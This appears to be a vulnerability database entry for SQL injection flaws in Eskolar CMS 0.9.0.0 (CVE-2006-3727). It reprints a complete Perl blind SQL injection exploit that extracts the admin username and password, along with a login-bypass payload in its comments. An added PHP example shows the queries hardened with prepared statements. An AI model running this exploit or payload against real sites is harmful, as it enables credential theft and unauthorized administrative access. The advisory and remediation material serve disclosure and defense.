CVE-2006-3727
CVSS 7.5
Published: 2006-07-21 10:03:00
Last revised: 2011-03-07 21:39:21

[Original] Multiple SQL injection vulnerabilities in Eskolar CMS 0.9.0.0 allow remote attackers to execute arbitrary SQL commands via the (1) gr_1_id, (2) gr_2_id, (3) gr_3_id, and (4) doc_id parameters in (a) index.php; the (5) uid and (6) pwd parameters in (b) php/esa.php; and possibly other vectors related to files in php/lib/ including (c) del.php, (d) download_backup.php, (e) navig.php, (f) restore.php, (g) set_12.php, (h) set_14.php, and (i) upd_doc.php.


[CNNVD] No CNNVD data available.



- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3727
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3727
(official data source) NVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/27809
(UNKNOWN)  XF  eskolar-phpesa-sql-injection(27809)
http://xforce.iss.net/xforce/xfdb/27808
(UNKNOWN)  XF  eskolar-index-sql-injection(27808)
http://www.vupen.com/english/advisories/2006/2869
(UNKNOWN)  VUPEN  ADV-2006-2869
http://www.securityfocus.com/bid/19045
(UNKNOWN)  BID  19045
http://www.osvdb.org/27399
(UNKNOWN)  OSVDB  27399
http://www.osvdb.org/27398
(UNKNOWN)  OSVDB  27398
http://www.osvdb.org/27397
(UNKNOWN)  OSVDB  27397
http://www.osvdb.org/27396
(UNKNOWN)  OSVDB  27396
http://www.osvdb.org/27395
(UNKNOWN)  OSVDB  27395
http://www.osvdb.org/27394
(UNKNOWN)  OSVDB  27394
http://www.osvdb.org/27393
(UNKNOWN)  OSVDB  27393
http://www.osvdb.org/27392
(UNKNOWN)  OSVDB  27392
http://www.osvdb.org/27391
(UNKNOWN)  OSVDB  27391
http://secunia.com/advisories/21101
(VENDOR_ADVISORY)  SECUNIA  21101
http://milw0rm.com/exploits/2032
(UNKNOWN)  MILW0RM  2032

- Vulnerability information (2032)

Eskolar CMS 0.9.0.0 Remote Blind SQL Injection Exploit (EDBID:2032)
php webapps
2006-07-18 Verified
Author: Jacek Wlodarczyk
#==================================================================================================
#!/usr/bin/perl
use IO::Socket;
#==================================================================================================

#==============================================================================#

#        Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com                 #

#==============================================================================#

#==================================================================================================
#Title:       Eskolar CMS 0.9.0.0 Blind SQL Injection Exploit and bypass admin logon vulnerability
#Application: Eskolar CMS
#Version:     0.9.0.0
#Url:         http://sourceforge.net/projects/eskolar/
#==================================================================================================

#==================================================================================================
#Affected software description:

#Not properly sanitized input can be used to inject crafted SQL queries and cause
#the database server to generate an invalid SQL query. We can use a Blind SQL Injection attack
#to determine the username and password for the CMS, and also classical SQL Injection
#to bypass the admin logon. The password for the CMS is stored in the database as clear text!
#The addslashes() function is used to filter GET variables, but we can prepare an
#SQL query without slashes in a Blind attack. addslashes() is not applied to the
#variables used to log in, so we can use classical SQL Injection to log in as admin.

#Vulnerable files: index.php, php/lib/del.php, php/lib/download_backup.php, php/lib/navig.php,
#php/lib/restore.php, php/lib/set_12.php, php/lib/set_14.php, php/lib/upd_doc.php

#==================================================================================================

#==================================================================================================
#Sample vulnerable code: (Blind attack) (index.php - lines 161-172)

#if (isset ($_GET['gr_1_id'])) {
#	$gr_1_id = (get_magic_quotes_gpc()) ? $_GET['gr_1_id'] : addslashes($_GET['gr_1_id']);
#}
#if (isset ($_GET['gr_2_id'])) {
#	$gr_2_id = (get_magic_quotes_gpc()) ? $_GET['gr_2_id'] : addslashes($_GET['gr_2_id']);
#}
#if (isset ($_GET['gr_3_id'])) {
#	$gr_3_id = (get_magic_quotes_gpc()) ? $_GET['gr_3_id'] : addslashes($_GET['gr_3_id']);
#}
#if (isset ($_GET['doc_id'])) {
#	$doc_id = (get_magic_quotes_gpc()) ? $_GET['doc_id'] : addslashes($_GET['doc_id']);
#}

#...

#index.php - line 202
#$q = "SELECT * FROM ".$prefix."_admin_group_3 WHERE id = ".$gr_3_id." ORDER BY 'sorted' ASC";
#etc.

#...
#==================================================================================================

#==================================================================================================
#Bypass admin logon:

#Vulnerable code: (php/esa.php - lines 27-35)

#$uid = isset ($_POST['uid']) ? $_POST['uid'] : $_SESSION['uid'];
#$pwd = isset ($_POST['pwd']) ? $_POST['pwd'] : $_SESSION['pwd'];
#//$prefix="esa";
#$enter = 0;
#$_SESSION['uid'] = $uid;
#$_SESSION['pwd'] = $pwd;

#mysql_select_db($database_bkb, $bkb);
#$q_a = "SELECT * FROM ".$prefix."_admin_user WHERE `user` = '".$uid."' AND `password` = '".$pwd."'";

## If magic_quotes_gpc = Off, an attacker can log in as admin using a classical SQL Injection attack.
## Eg: USER: j4ck' or 1=1/*
##     PSW:  *blank*

#===================================================================================================


#PoC Exploit:


if ((@ARGV lt 2) or (@ARGV gt 3))
  {
    &usage;
  }


sub usage()
{
  print "\r\n (c) Jacek Wlodarczyk (j4ck)\r\n\r\n";
  print "- Exploit for Eskolar CMS 0.9.0.0\r\n\r\n";
  print "- Usage: $0 <target> <target directory>\r\n";
  print "- <target>              -> Victim's target eg: http://www.victim.com\r\n";
  print "- <target directory>    -> Path to index.php  eg: /eskolar/\r\n";
  print "- Eg: http://127.0.0.1 /esa/\r\n\r\n";
  exit();
}


$HOST        = $ARGV[0];
$DIR         = $ARGV[1];
$prefixDB    = $ARGV[2];


if (@ARGV eq 2)
  {
    $prefixDB    = "esa";
  }



print "\r\nATTACKING : ".$HOST.$DIR."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;


#$positive = "?doc_id=999%20or%201=1--";
#$negative = "?doc_id=999%20or%201=0--";


       @ARR = ("user","password");


print "Connecting ...\r\n";
sleep(1);

TOP:
for ($k=0;$k<=$#ARR;$k++)

  {

    $j=1;
    $i = 32;
    $string='';
    $res='';


    while()
      {
        $l=0;
        for ($i=32;$i<=127;$i++)
          {


            $val  = "?doc_id=99999";
            $val .= "/**/or/**/1=1";
            $val .= "/**/and/**/ascii(substring(";
            $val .= "(select/**/$ARR[$k]/**/from/**/".$prefixDB."_admin_user/**/limit/**/1)";
            $val .= ",$j,1))/**/=/**/$i";


            $data="$DIR$val";

            $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error - connection failed!\r\n\r\n";

            print $req "GET $data HTTP/1.1\r\n";
            print $req "Host: $HOST\r\n";
            print $req "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\r\n";
            print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
            print $req "Accept-Language: en-us;q=0.7,en;q=0.3\r\n";
            print $req "Accept-Encoding: gzip,deflate\r\n";
            print $req "Keep-Alive: 300\r\n";
            print $req "Connection: Keep-Alive\r\n";
            print $req "Cache-Control: no-cache\r\n";
            print $req "Connection: close\r\n\r\n";


            while ($ans = <$req>)
              {
                if ($ans =~ /404/ )
                  {
                    printf "\n\nFile not found.\r\n\r\n";
                    exit;
                  }


                if ($ans =~ /400/ )
                  {
                    printf "\n\nBad request.\r\n\r\n";
                    exit;
                  }


                if ($ans =~ /ORDER BY sorted ASC/)
                  {

                    $string .= chr($i);

                    if (((ord(substr($string,length($string)-1,length($string)-1))-ord(substr($string,length($string)-2,length($string)-2))) %2 eq 0) and (length($string) ge 2))
                      {
                        $res .= chr($i-1);
                        $l=1;
                      }
                    last;
                  }
              }

            if ($l eq 1)
              {
                print "Found: ".chr($i-1)."\r\n";
                sleep(1);
                last;
              }

            if ($i eq 127)
              {

                print "$ARR[$k] found: $res\r\n";
                $ARR[$k] = $res;

                if (($k eq 1) and (($ARR[0] ne '') or ($ARR[1] ne '')))
                  {
                    print "\r\n\r\n\r\n--------------------  Username => $ARR[0]";
                    print  " Password => $ARR[1]  -----------------------\r\n";
                  }

                elsif (($ARR[0] eq '') and ($ARR[1] eq ''))
                {
                  print "Nothing found ...";
                }


                if ($k eq 0)
                  {
                    sleep(1);
                    print "\nTrying Password\r\n";
                    sleep(1);
                  }

                sleep(1);

                next TOP;

              }

            print "\t\t\t\tTrying: ".chr($i)."\r\n";

          }

        $string = '';

        $j++;
      }

  }

#========================================================================================================

# milw0rm.com [2006-07-18]
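A hardened form of the two fragments quoted in the exploit comments above (the numeric gr_*_id/doc_id lookup in index.php and the login check in php/esa.php), added here as an example. This is not Eskolar's own code; it assumes a mysqli connection in $db, the same table names built from $prefix, and a `password` column that has been migrated to password_hash() digests.

```php
<?php
// Added example, not Eskolar CMS code. Assumes $db is an open mysqli connection
// and the admin tables are still named {$prefix}_admin_group_3 / {$prefix}_admin_user.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // make prepare()/execute() throw on failure

// index.php path: gr_*_id / doc_id were concatenated unquoted into a numeric
// comparison, so addslashes() could not help (no quote is needed to break out).
// Validate the value as an integer and bind it as a parameter instead.
function load_group(mysqli $db, string $prefix, $raw_id): ?array
{
    // FILTER_VALIDATE_INT rejects anything that is not a whole integer, such as
    // "99999 or 1=1", instead of silently truncating it the way (int) casts do.
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // treat as "not found"; the raw value never reaches the SQL text
    }
    // Table name comes from configuration, never from the request; the column
    // and ORDER BY clause are literals, and the only user data is the bound integer.
    $stmt = $db->prepare("SELECT * FROM {$prefix}_admin_group_3 WHERE id = ? ORDER BY sorted ASC");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// php/esa.php path: uid and pwd went into a quoted string with no escaping at
// all, and the password was compared (and stored) in clear text. Bind the user
// name, fetch the stored hash, and verify the password in PHP rather than in SQL.
function admin_login(mysqli $db, string $prefix, string $uid, string $pwd): bool
{
    $stmt = $db->prepare("SELECT `password` FROM {$prefix}_admin_user WHERE `user` = ?");
    $stmt->bind_param('s', $uid);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if ($row === null) {
        return false; // unknown user; no SQL-controlled "OR 1=1" shortcut exists here
    }
    // `password` now holds a password_hash() digest; password_verify() is
    // constant-time and never needs the submitted value inside a query.
    return password_verify($pwd, $row['password']);
}
```

With this shape the session should keep only the verified user name, not the submitted password as the original esa.php did.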

- Vulnerability information

27391
Eskolar CMS index.php Multiple Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

Eskolar CMS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'gr_1_id', 'gr_2_id', 'gr_3_id', and 'doc_id' variables. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- Timeline

2006-07-18 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
